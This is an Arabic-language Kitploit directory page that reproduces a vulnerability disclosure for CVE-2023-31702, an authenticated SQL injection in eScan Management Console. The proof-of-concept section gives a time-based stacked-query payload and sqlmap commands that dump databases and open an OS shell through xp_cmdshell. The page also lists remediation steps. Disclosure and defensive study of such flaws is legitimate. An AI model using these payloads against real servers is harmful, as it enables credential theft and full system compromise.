Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-31702 — CVE-2023-31702 هي ثغرة حقن SQL مصادَق عليها تم اكتشافها في وحدة التحكم الإدارية eScan Management Console من MicroWorld Technologies الإصدار 14.0.1400.2281. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-31702
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHubsahiloj/cve-2023-31702

CVE-2023-31702

CVE-2023-31702 هي ثغرة حقن SQL مصادَق عليها تم اكتشافها في وحدة التحكم الإدارية eScan Management Console من MicroWorld Technologies الإصدار 14.0.1400.2281.

عرض المستودع
211منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-31702 — حقن SQL في eScan Management Console (يتطلب مصادقة)

CVE Severity Type Auth


نظرة عامة

CVE-2023-31702 هي ثغرة حقن SQL تتطلب مصادقة تم اكتشافها في MicroWorld Technologies eScan Management Console الإصدار 14.0.1400.2281. توجد الثغرة في نقطة الوصول GetUserCurrentPwd، حيث يتم تمرير المعامل UsrId مباشرة إلى استعلام SQL دون تعقيم مناسب أو استخدام استعلامات معاملية. يمكن للمهاجم المصادَق استغلال هذا الخلل لتنفيذ حقن SQL أعمى قائم على الوقت، واستخراج قاعدة البيانات الخلفية بالكامل، والحصول في النهاية على شل أوامر تفاعلي لنظام التشغيل على خادم Microsoft SQL Server الأساسي — مما يؤدي إلى اختراق النظام بالكامل.


تفاصيل الثغرة

الحقلالتفاصيل
معرف CVECVE-2023-31702
نوع الثغرةحقن SQL (أعمى قائم على الوقت / استعلامات مكدسة)
المنتج المتأثرMicroWorld Technologies eScan Management Console
الإصدار المتأثر14.0.1400.2281
نقطة الوصول المعرضة/ewconsole/ewconsole.dll/GetUserCurrentPwd
المعامل المعرضUsrId
المصادقةمطلوبة (بيانات اعتماد صالحة لوحدة التحكم)
تم الاختبار علىWindows
قياس CVSS v3.18.8 (عالية)
متجه CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
تاريخ الإبلاغ16 مايو 2023
المؤلفSahil Ojha

البرمجيات المتأثرة

الحقلالتفاصيل
البائعMicroWorld Technologies
المنتجeScan Management Console
الصفحة الرئيسية للبائعhttps://www.escanav.com
رابط البرنامجhttps://cl.escanav.com/ewconsole.dll
المنصةWindows

وصف الثغرة

يوفر eScan Management Console واجهة قائمة على الويب لإدارة أمان نقاط النهاية عبر شبكة المؤسسة. تكشف ميزة "عرض ملف تعريف المستخدم" عن نقطة وصول شبيهة بـ REST:

root@kitploit:~
/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=<ID>&cnt=<counter>

يتم تضمين المعامل UsrId في استعلام SQL خلفي دون تحقق أو تهريب أو استخدام استعلامات معاملية. وهذا يسمح لمهاجم مصادق بحقن عبارات SQL عشوائية في الاستعلام، مما يؤدي إلى:

  • حقن SQL أعمى قائم على الوقت — باستخدام WAITFOR DELAY لتأكيد قابلية الاستغلال.
  • تنفيذ استعلامات مكدسة — تمكين حمولات حقن متعددة العبارات.
  • تفريغ قاعدة البيانات بالكامل — استخراج جميع الجداول والمستخدمين وبيانات الاعتماد والبيانات الحساسة من خادم SQL الخلفي.
  • تنفيذ أوامر نظام التشغيل — استغلال الإجراء المخزن xp_cmdshell في SQL Server (المفعَّل عبر sp_configure) لتنفيذ أوامر نظام تشغيل عشوائية على الخادم بصلاحيات حساب خدمة SQL Server.

التأثير

الاستغلال الناجح لهذه الثغرة يسمح للمهاجم بـ:

  • 🔴 تفريغ قاعدة بيانات SQL Server بالكامل، بما في ذلك بيانات اعتماد المستخدمين وبيانات التكوين والمعلومات الحساسة للمؤسسة.
  • 🔴 الحصول على شل تفاعلي لنظام التشغيل على خادم Windows المستضيف لمثيل SQL Server.
  • 🔴 تنفيذ أوامر نظام تشغيل عشوائية (مثل إنشاء حسابات خلفية، وسرقة البيانات، والتنقل إلى موارد الشبكة الداخلية).
  • 🔴 اختراق خادم إدارة eScan بالكامل وربما جميع نقاط النهاية التي يديرها.

⚠️ ملاحظة: يجب على المهاجم أولاً الحصول على بيانات اعتماد صالحة لوحدة تحكم eScan للإدارة. ومع ذلك، بمجرد المصادقة، يكون الاستغلال مباشرًا ولا يتطلب صلاحيات وحدة تحكم مرتفعة.


إثبات المفهوم

الخطوة 1 — الوصول إلى نقطة الوصول المعرضة

بعد المصادقة على وحدة تحكم eScan للإدارة، انتقل إلى عنوان URL التالي:

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493

يعيد هذا بيانات ملف تعريف المستخدم الحالي، مما يؤكد أن نقطة الوصول متاحة.

نقطة الوصول المعرضة


الخطوة 2 — تأكيد حقن SQL بحمولة زمنية

احقن الحمولة الزمنية التالية في المعامل UsrId:

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176

تحليل الحمولة:

  • ; — ينهي عبارة SQL الأصلية ويبدأ عبارة جديدة (استعلام مكدس).
  • WAITFOR DELAY '0:0:5' — يطلب من خادم SQL التوقف لمدة 5 ثوانٍ قبل الرد.
  • -- — يعلّق باقي الاستعلام الأصلي لمنع أخطاء الصياغة.

إذا تأخر استجابة الخادم نحو 5 ثوانٍ، يتم تأكيد الحقن.

تم تأكيد الحقن الزمني


الخطوة 3 — تفريغ قواعد البيانات باستخدام SQLMap

بمجرد تأكيد حقن SQL الأعمى، يمكن استخراج قاعدة البيانات بالكامل باستخدام SQLMap:

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --dbs \
  --batch

يقوم هذا بتعداد جميع قواعد البيانات المستضافة على خادم SQL الخلفي.


الخطوة 4 — الحصول على شل نظام التشغيل عبر SQLMap

يمكن لـ SQLMap أيضًا تصعيد الهجوم إلى تنفيذ أوامر على مستوى نظام التشغيل عن طريق تمكين واستغلال xp_cmdshell:

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --os-shell \
  --batch

ينشئ هذا شل نظام تشغيل تفاعلي على مضيف SQL Server.

الحصول على شل نظام التشغيل عبر SQLMap


الخطوة 5 — تنفيذ أوامر نظام التشغيل على الخادم

مع إنشاء شل نظام التشغيل، يمكن تنفيذ أوامر Windows عشوائية على الخادم:

تنفيذ أوامر نظام التشغيل


المعالجة

يوصى بشدة بالتدابير التالية لمعالجة هذه الثغرة والتخفيف من حدتها:

  1. استخدام استعلامات معاملية / عبارات مُجهزة — لا تقم أبدًا بدمج مدخلات المستخدم مباشرة في استعلامات SQL. استخدم معاملات مرتبطة لفصل البيانات عن منطق الاستعلام.

  2. التحقق من المدخلات وتعقيمها — تحقق بدقة من جميع المعاملات المقدمة من المستخدم على الخادم. بالنسبة للمعرفات الرقمية مثل UsrId، فرض إدخال أعداد صحيحة فقط ورفض أي قيمة تحتوي على أحرف خاصة.

  3. تطبيق تصحيح البائع — حدّث وحدة تحكم eScan للإدارة إلى أحدث إصدار متاح. تواصل مع دعم MicroWorld Technologies أو راجع نشرات الأمان الخاصة بهم للحصول على أحدث إصدار مصحح.

  4. الحد الأدنى من الصلاحيات لحسابات قاعدة البيانات — يجب أن يمتلك حساب قاعدة بيانات التطبيق الحد الأدنى من الصلاحيات المطلوبة فقط. يجب ألا يمتلك أدوار sysadmin أو db_owner، ويجب تعطيل xp_cmdshell.

  5. تعطيل xp_cmdshell — ما لم يكن مطلوبًا صراحةً، قم بتعطيل الإجراء المخزن الموسع xp_cmdshell على مثيل SQL Server:

    root@kitploit:~
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    
  6. جدار حماية تطبيقات الويب (WAF) — انشر جدار حماية WAF لاكتشاف ومنع أنماط حقن SQL الشائعة كإجراء دفاع متعمق.

  7. تقسيم الشبكة — قيّد الوصول إلى وحدة تحكم eScan للإدارة على نطاقات IP موثوقة وتأكد من عدم تعرض خادم SQL مباشرة للإنترنت.


الجدول الزمني للإفصاح

التاريخالحدث
16 مايو 2023تم اكتشاف الثغرة والإبلاغ عنها بواسطة Sahil Ojha
مايو 2023تم تعيين CVE-2023-31702 بواسطة MITRE
مايو 2023الإفصاح العام

المراجع

  • NVD — CVE-2023-31702 (تحقق من NVD لمعرفة حالة النشر الحالية)
  • MITRE — CVE-2023-31702 (تحقق من MITRE لمعرفة حالة النشر الحالية)
  • MicroWorld Technologies eScan
  • SQLMap — أداة حقن SQL التلقائية
  • OWASP — حقن SQL
  • CWE-89 — تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL

المؤلف

Sahil Ojha — باحث أمني

هذا الإفصاح مخصص للأغراض التعليمية وأغراض البحث الأمني فقط. استغلال هذه الثغرة ضد أنظمة دون إذن كتابي صريح يعد غير قانوني وغير أخلاقي.

تنزيل الأداة